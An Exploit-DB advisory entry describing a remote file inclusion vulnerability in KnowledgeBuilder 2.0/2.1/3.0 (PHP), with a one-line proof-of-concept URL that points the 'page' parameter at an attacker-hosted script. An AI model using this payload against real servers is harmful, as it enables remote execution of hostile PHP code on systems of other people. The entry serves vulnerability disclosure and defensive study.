KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion

EDB-ID:

23476


Author:

Zero X

Type:

webapps


Platform:

PHP

Date:

2003-12-24


source: https://www.securityfocus.com/bid/9292/info

KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. 

http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script]